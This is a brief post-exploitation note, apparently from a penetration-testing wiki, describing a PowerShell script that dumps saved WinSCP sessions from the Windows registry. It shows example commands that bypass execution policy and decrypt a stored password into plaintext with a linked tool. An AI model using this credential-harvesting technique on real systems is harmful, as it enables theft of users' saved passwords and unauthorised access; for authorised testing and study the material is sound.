# Windows - WinSCP

This script will loop through all users in the registry (HKLM) and dump all saved WinSCP sessions.

### Exampe Usage

```powershell
PS E:\devop-scripts> powershell.exe -ExecutionPolicy Bypass .\winscp_dump.ps1
[+] User: void - Session: root@127.0.0.1
  HostName: 127.0.0.1
  UserName: root
  EncPassword: A35C745EFEDC2E3333286D6E6B726C726C726D0834352F152F11250F393F2E39280C3D2F2F2B387D7E7F6D7D7E7F5B3C20AF

[+] Saved all output to logfile: C:\Users\void\AppData\Local\Temp\winscp_dump.log
```

Decrypt the encrypted password with [`WinSCPDec.py`](https://gist.github.com/tijldeneut/69717c56de3e16e97516a1964fa49bfd) or similar.

```bash
apt-kali :: ~ » python3 WinSCPDec.py --host=127.0.0.1 --user=root --pass=A35C745EFEDC2E3333286D6E6B726C726C726D0834352F152F11250F393F2E39280C3D2F2F2B387D7E7F6D7D7E7F5B3C20AF
[+] Succes!
     ThisIsMySecretPasswd!"#1!"#
```

***

{% embed url="<https://github.com/0xPThree/Windows-Harvesting>" %}